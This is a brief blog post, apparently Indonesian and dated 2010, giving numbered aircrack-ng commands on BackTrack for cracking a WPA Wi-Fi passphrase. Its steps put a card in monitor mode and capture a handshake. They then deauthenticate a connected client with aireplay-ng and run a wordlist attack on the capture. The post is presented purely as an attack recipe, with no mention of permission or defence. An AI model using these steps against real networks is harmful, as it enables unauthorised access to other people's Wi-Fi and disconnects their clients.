' Wi-Fi Hacking – Crack WPA Wi-Fi Hacking – Crack WPA | Kluwan Backtrack Wi-Fi Hacking – Crack WPA

Minggu, 07 Februari 2010

Wi-Fi Hacking – Crack WPA

Still using BackTrack OS. Step by step :
  1. airmon-ng stop ath0
  2. airmon-ng start wifi0
  3. airodump-ng ath0
  4. airodump-ng -c CHANNEL_NUMBER -w FILE_NAME –bssid MAC_AP ath0 [Wait until shakehand packet captured]
  5. aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENT ath0
  6. aircrack-ng -w FILE_WORD_LIST -b MAC_AP FILE_NAME*.cap
  7. Wait and see the passphrase
  8. done. ;)
Good Luck… :)

Anda Sudah Baca Yang Ini? :

0 komentar:

Klik Here To Show All Comment


Posting Komentar

newer page older page home
top